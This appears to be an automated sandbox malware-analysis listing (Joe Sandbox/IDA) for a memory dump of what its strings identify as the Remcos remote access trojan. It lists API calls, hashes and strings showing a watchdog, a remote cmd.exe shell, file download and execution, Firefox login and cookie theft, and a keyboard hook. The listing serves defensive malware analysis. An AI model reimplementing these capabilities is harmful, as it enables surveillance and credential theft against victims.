                                      • Instruction Fuzzy Hash: F0F062322012177AFB312E27AC05A6B37599F81F77F23412BF954A6391EA3CDA01456E
                                      APIs
                                      • socket.WS2_32(?,00000001,00000006), ref: 00404832
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052EB,?,?,00000000,00000000,?,?,00000000,004051E8,?,00000000), ref: 0040486E
                                        • Part of subcall function 0040487E: WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEventStartupsocket
                                      • String ID:
                                      • API String ID: 1953588214-0
                                      • Opcode ID: d0890d6b9dbf7aa10081a8f0c48d4e4836abc09c18ec6d90db35a2a0ad95277d
                                      • Instruction ID: 6a7ca6a32121b389846a28cffc2ecd87dee0ffbb862a0929ff73aad7f5bc5f79
                                      • Opcode Fuzzy Hash: d0890d6b9dbf7aa10081a8f0c48d4e4836abc09c18ec6d90db35a2a0ad95277d
                                      • Instruction Fuzzy Hash: 3301B1B14087809FD7349F28B8446877FE0AB15300F048D6EF1CA93BA1D3B1A444CB18
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                      • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                                      • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                      • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D
                                      APIs
                                      • getaddrinfo.WS2_32(00000000,00000000,00000000,0046FACC,00471FFC,00000000,00413BDE,00000000,00000001), ref: 00413961
                                      • WSASetLastError.WS2_32(00000000), ref: 00413966
                                        • Part of subcall function 004137DC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                        • Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 0041386D
                                        • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                        • Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 00413894
                                        • Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 004138CC
                                        • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                        • Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                        • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                      • String ID:
                                      • API String ID: 1170566393-0
                                      • Opcode ID: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
                                      • Instruction ID: 06324504dbe977c901379e35fefec32dabdef79d564ed510376fbe661015aea4
                                      • Opcode Fuzzy Hash: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
                                      • Instruction Fuzzy Hash: FFD02B723001213B9310AB5DAC01FB76B9CDFD27227050037F409C3110D7948D4147AD
                                      APIs
                                      • _wcslen.LIBCMT ref: 00408F39
                                        • Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
                                        • Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 0040929B
                                        • Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 004092A7
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread$_wcslen
                                      • String ID:
                                      • API String ID: 1119755333-0
                                      • Opcode ID: 3bcb627612e8e928e1c5fd4c96e78644081bbb7b3fa9bbd93cdb902c135db829
                                      • Instruction ID: bde1965b6f08766bd400bb9d626b3f4fd5e121562736213e95ba31f4244dc5e2
                                      • Opcode Fuzzy Hash: 3bcb627612e8e928e1c5fd4c96e78644081bbb7b3fa9bbd93cdb902c135db829
                                      • Instruction Fuzzy Hash: 86218F719040899ACB09FFB5DD528EE7BB5AE51308F00003FF941722E2DE785A49DA99
                                      APIs
                                        • Part of subcall function 00443005: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000), ref: 00443046
                                      • _free.LIBCMT ref: 0044D320
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
                                      • Instruction ID: 6435cefd8bbe106a332e767b8e47ea9a619cae55f612b2c95de9f127ac4edb1d
                                      • Opcode Fuzzy Hash: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
                                      • Instruction Fuzzy Hash: 260149736003056BF321CF69D885E5AFBE8FB89374F25061EE585832C0EA34A905C738
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000), ref: 00443046
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                                      • Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
                                      • Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                                      • Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD
                                      APIs
                                      • WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startup
                                      • String ID:
                                      • API String ID: 724789610-0
                                      • Opcode ID: a39f64238678d40d2918f9ecd5b136492fe542bf64fe6c2875bf53ab9f510d38
                                      • Instruction ID: a9c8eddc0db4f5dff40e6a71866b0cfb015b1534c728beba927ba249e589f683
                                      • Opcode Fuzzy Hash: a39f64238678d40d2918f9ecd5b136492fe542bf64fe6c2875bf53ab9f510d38
                                      • Instruction Fuzzy Hash: C2D0123255860C4ED610ABB4AD0F8A5775CC313A16F4003BAACB9835D3F640571CC2AB
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: send
                                      • String ID:
                                      • API String ID: 2809346765-0
                                      • Opcode ID: 01e24c4520a6d3c4395155137d096ef59c3bb50acc7407598b25046a660799bf
                                      • Instruction ID: 7b6f63586de962cf13c642be8f044126cb3c52731424b67aaf056de8313b57d0
                                      • Opcode Fuzzy Hash: 01e24c4520a6d3c4395155137d096ef59c3bb50acc7407598b25046a660799bf
                                      • Instruction Fuzzy Hash: 41B092B9108302BFCA160B60CC0887A7EA6ABC8786B00882CF546421B0C636C460AB2A
                                      APIs
                                      • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                                        • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                        • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                        • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                                      • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                                      • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                      • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                                      • API String ID: 3018269243-1736093966
                                      • Opcode ID: 18c2990b9abcfe3d8747d65eb463bf7f99fa2203985efe1a118a346ee823f20b
                                      • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                                      • Opcode Fuzzy Hash: 18c2990b9abcfe3d8747d65eb463bf7f99fa2203985efe1a118a346ee823f20b
                                      • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                                      APIs
                                      • SetEvent.KERNEL32(?,?), ref: 00406D4A
                                      • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                                      • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                                        • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
                                        • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
                                        • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB
                                        • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
                                        • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                        • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                        • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B27
                                        • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00471E90,?,?,?,?,?,?,0040545D), ref: 00404B55
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                                      • DeleteFileA.KERNEL32(?), ref: 0040768E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                                      • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                      • API String ID: 1385304114-1507758755
                                      • Opcode ID: b072977f8e604149e62739522ac904fafa89c09223962289d5b3735bb646f76b
                                      • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
                                      • Opcode Fuzzy Hash: b072977f8e604149e62739522ac904fafa89c09223962289d5b3735bb646f76b
                                      • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 004056C6
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      • __Init_thread_footer.LIBCMT ref: 00405703
                                      • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                                      • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                                        • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                                      • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                                      • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                                      • CloseHandle.KERNEL32 ref: 00405A03
                                      • CloseHandle.KERNEL32 ref: 00405A0B
                                      • CloseHandle.KERNEL32 ref: 00405A1D
                                      • CloseHandle.KERNEL32 ref: 00405A25
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                      • String ID: SystemDrive$cmd.exe
                                      • API String ID: 2994406822-3633465311
                                      • Opcode ID: 4568db86e005e5ee8b267df344be70a7839f6dd1d3c8f420728b284f3f3e7f32
                                      • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                                      • Opcode Fuzzy Hash: 4568db86e005e5ee8b267df344be70a7839f6dd1d3c8f420728b284f3f3e7f32
                                      • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                                      • FindClose.KERNEL32(00000000), ref: 0040AB0A
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                                      • FindClose.KERNEL32(00000000), ref: 0040AC53
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                      • API String ID: 1164774033-3681987949
                                      • Opcode ID: c4a8a3561dda33a316002e905d5158176c4bb62f60b9ed2c5276f134ba47fa8b
                                      • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                                      • Opcode Fuzzy Hash: c4a8a3561dda33a316002e905d5158176c4bb62f60b9ed2c5276f134ba47fa8b
                                      • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                                      • FindClose.KERNEL32(00000000), ref: 0040AD0A
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                                      • FindClose.KERNEL32(00000000), ref: 0040ADF0
                                      • FindClose.KERNEL32(00000000), ref: 0040AE11
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$File$FirstNext
                                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 3527384056-432212279
                                      • Opcode ID: 3b5b8b69b03ca4378a7fc1b44b4c034fda2df619af0ad02dc3fa9ed3aead64ba
                                      • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
                                      • Opcode Fuzzy Hash: 3b5b8b69b03ca4378a7fc1b44b4c034fda2df619af0ad02dc3fa9ed3aead64ba
                                      • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
                                      APIs
                                      • OpenClipboard.USER32 ref: 00414EC2
                                      • EmptyClipboard.USER32 ref: 00414ED0
                                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                                      • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                                      • CloseClipboard.USER32 ref: 00414F55
                                      • OpenClipboard.USER32 ref: 00414F5C
                                      • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                      • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                      • CloseClipboard.USER32 ref: 00414F84
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                      • String ID:
                                      • API String ID: 3520204547-0
                                      • Opcode ID: d8689cdbc36a6c12abc390eb704629ab0281cfc086c28c32ccde0c988e12962c
                                      • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
                                      • Opcode Fuzzy Hash: d8689cdbc36a6c12abc390eb704629ab0281cfc086c28c32ccde0c988e12962c
                                      • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00472200,00000001), ref: 0041A118
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A125
                                        • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00472200,00000001), ref: 0041A146
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A16C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                      • String ID: pth_unenc
                                      • API String ID: 2341273852-4028850238
                                      • Opcode ID: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
                                      • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                                      • Opcode Fuzzy Hash: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
                                      • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 0$1$2$3$4$5$6$7
                                      • API String ID: 0-3177665633
                                      • Opcode ID: 05f2545c527969495595f266b9e9e19f26da2af4dc4ec233c9d36f06689b886f
                                      • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                                      • Opcode Fuzzy Hash: 05f2545c527969495595f266b9e9e19f26da2af4dc4ec233c9d36f06689b886f
                                      • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                                      APIs
                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                                      • GetLastError.KERNEL32 ref: 00418771
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                      • String ID:
                                      • API String ID: 3587775597-0
                                      • Opcode ID: 5d103ea2803b93333783507eb1b72864fbff0dabe2a5887d9a93522a71ca141a
                                      • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                                      • Opcode Fuzzy Hash: 5d103ea2803b93333783507eb1b72864fbff0dabe2a5887d9a93522a71ca141a
                                      • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                                      • FindClose.KERNEL32(00000000), ref: 0040B3BE
                                      • FindClose.KERNEL32(00000000), ref: 0040B3E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 1164774033-405221262
                                      • Opcode ID: 8ea844f9e96e25a3d3715c9fa27678d1afb6c6d452c5d3d6b58d1cac35a1c1e1
                                      • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                                      • Opcode Fuzzy Hash: 8ea844f9e96e25a3d3715c9fa27678d1afb6c6d452c5d3d6b58d1cac35a1c1e1
                                      • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                                      • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                                      • GetLastError.KERNEL32 ref: 00409375
                                        • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                                      • TranslateMessage.USER32(?), ref: 004093D2
                                      • DispatchMessageA.USER32(?), ref: 004093DD
                                      Strings
                                      • Keylogger initialization failure: error , xrefs: 00409389
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                      • String ID: Keylogger initialization failure: error
                                      • API String ID: 3219506041-952744263
                                      • Opcode ID: fdc0b474fe1aff0b22fd9a46203375ee37c9d39229ef2232f764eb0bd3d466e4
                                      • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                                      • Opcode Fuzzy Hash: fdc0b474fe1aff0b22fd9a46203375ee37c9d39229ef2232f764eb0bd3d466e4
                                      • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                                      APIs
                                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                                      • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressCloseCreateLibraryLoadProcsend
                                      • String ID: SHDeleteKeyW$Shlwapi.dll
                                      • API String ID: 2127411465-314212984
                                      • Opcode ID: 5714083259c36e6f05816454bea7db1171515a15fe344702cccc7fd6dce110b0
                                      • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                                      • Opcode Fuzzy Hash: 5714083259c36e6f05816454bea7db1171515a15fe344702cccc7fd6dce110b0
                                      • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                                      APIs
                                      • _free.LIBCMT ref: 00446741
                                      • _free.LIBCMT ref: 00446765
                                      • _free.LIBCMT ref: 004468EC
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                      • _free.LIBCMT ref: 00446AB8
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
